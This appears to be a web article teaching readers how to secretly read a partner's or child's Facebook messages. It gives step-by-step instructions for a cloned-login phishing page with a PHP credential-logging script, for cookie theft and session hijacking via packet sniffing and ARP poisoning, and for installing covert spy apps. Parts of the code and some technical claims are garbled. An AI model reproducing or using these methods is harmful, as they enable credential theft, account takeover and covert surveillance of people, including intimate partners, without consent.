How to Track Someone’s Facebook Messages

Do you want to know whether your partner is cheating on you or just want to monitor who your child interacts with on Facebook? The best way to do this would be to hack into their Facebook messenger and read their messages without them knowing. You can hack into someone’s Facebook by sending them a phishing attack, recovering his/her password, or by just installing and subscribing to the best Facebook spy app. Phishing is a rather complex process that requires some technical skills. Recovering their account password requires you to know the target’s account name, number, and email address, among other details. 

Facebook spy apps are the simplest and easiest way to go, giving you instant access and real-time updates regarding your target’s Facebook activities. 

Whichever method you decide to use, here is how to get into my girlfriends facebook messages (or your’s in your case) 

Method 1: Phishing 

This method entails luring the target to a fake Facebook login page (a clone page you have created). When they enter their login details into the fake login page, you will know their login name, number or email address, and password. 

You may then use the login details to log into their Facebook account thereafter. The following steps will help you accomplish just that: 

Step 1: Get the Source Code 

Open Facebook on your preferred browser and ensure that you are logged out of your account. Press the Ctrl + U keys simultaneously to open a View Page Source tab. Copy the information on the browser tab that just opened onto a Notepad. 

Step 2: Modify the Action Attribute 

From the Notepad, press the Ctrl + F keyboard shortcut—the ‘Find’ shortcut—then run a search for ‘Action’. This should give you an address similar to:


Delete this address and replace it with: 


Now save the Notepad file on your computer as index.htm (this will be the phishing page for the attack). Open a new Notepad and save it as post.php. At this point, you should paste the following content into the post.php Notepad and save it: 


header (‘Location:’);

$handle = fopen(“usernames.txt”, “a”);

foreach($_POST as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle, $value);

fwrite($handle, “rn”);


fwrite($handle, “rn”);




Step 3: Upload the Files to a Web Hosting Service 

Choose any free or paid Web Hosting Service, create a user account with them and log into it. The procedure for uploading the files May differ from one service to another, but you need to navigate to Control panel > File Manager > publick_html. 

Delete default.php and replace it with the index.htm and post.php files you saved in step 2 above. 

Step 4: Copy the Facebook Phishing Page Address

To preview your Facebook Phishing Page (index.htm), click on the Preview button. This should open a page that is very similar to the Facebook login page. Copy the address to this page from the address bar on your browser. 

Now invite the target to click this link—by linking it to an email or text that appears to have been sent by Facebook. 

Step 5: Get the Target’s Facebook Login Credentials 

If the target clicks on the link, they will be redirected to your Phishing page where they will enter their login details trying to sign in to their Facebook account. When this happens, you can retrieve Target’s login credentials from your web hosting service’s file manager. Just navigate to File Manager > public_html.

Use the credentials to log into his/her Facebook account and view their messages discreetly. 

Method 2: Cookie Stealing and Facebook Session Hijacking

Another way to monitor someone’s Facebook messages discreetly would be to capture (steal) their Facebook session token—authentication cookies—and inject it into your browser. This way, the browser is likely to think that you are the account owner and give you access to the target’s Facebook account. 

Here is how you can do this:

Note: This method is more likely to work when you are using the same local area network (LAN) with the target. 

Step 1: Steal the Target’s Facebook Authentication Cookies 

Depending on the network type you are using, different methods may be used to steal their Facebook Authentication Cookies. If on a hub-based network, you can use any packet sniffer to sniff the Target’s traffic. If using a wireless network, you can use tools like Firesheep to capture authentication cookies. 

For switch-based networks, you need to use an ARP Poisoning request to capture the data. In this guide, we will be using a packet analyzer to capture someone’s Facebook cookies. Just download and install your preferred packet analyzer software on your computer. 

Step 2: Sniff for the Target’s Facebook Authentication Cookies

Launch the packet analyzer you installed in step 1, click on the Analyzer button, choose the appropriate interface, and then click on Start. Continue sniffing your target’s traffic for 10 to 20 minutes, after which you should just click on the Stop button from the Capture menu. 

Step 3: Filter the Result 

Many packet analyzer apps will allow you to filter the captured cookies. To find the ones you are interested in, apply an http.cookie contains “datr” filter. “Datr” is the cookie used by Facebook for Authentication, and should look like this: 


Next, make the analyzer display printable text only. For most package analyzer apps, you should navigate to Copy > Bytes > Printable Text only.

Step 4: Inject the Cookies 

Open the Firefox browser, navigate to Facebook, and ensure that you are signed out. Press the Alt + C keyboard shortcut to launch the Cookie Injector. Now paste the cookie value you obtained in step 3 above into the cookie Injector. 

Finally, you need to refresh the page to access the target’s Facebook account and read messages without them knowing. 

If your target is on an https:// connection, this method will not work unless he/she has disabled end-to-end encryption—which is very rare. 

The Ultimate Method: Facebook Spy Applications 

The two Facebook hacking methods described above are rather tedious and time-consuming and are not guaranteed to work. Even the Facebook Password recovery hack proposed by some experts is more likely to fail as you may not have the information required to reset the target’s Facebook password. 

Rather than having to use this trial and error approach, you should just use the best Facebook Spy app. Apps like mSpy, Mobilespy, and SpyBubble require a subscription fee of between $29 and $32 but are sure to work on multiple social media platforms. 

Once installed, the Spy app will run discreetly run and collect all the target’s Facebook activities, including sent and received messages. You can then view the collected information from your Spy App Dashboard. 

Final Verdict 

To monitor someone’s Facebook messages without them knowing, you first need to hack into their account. You can do this by resetting their Facebook password, Phishing, or Facebook session hijacking. While such methods may work from time to time, a simple password change on the target’s Facebook account will render all of them ineffective. 

To save time and resources, just install the right Spy App on your computer. Some of the leading Facebook Spy apps can monitor multiple platforms, including Facebook, Tinder, Snapchat, and Instagram. The app will allow you to track someone’s Facebook messages discreetly even if they happen to change the password.

Leave a Comment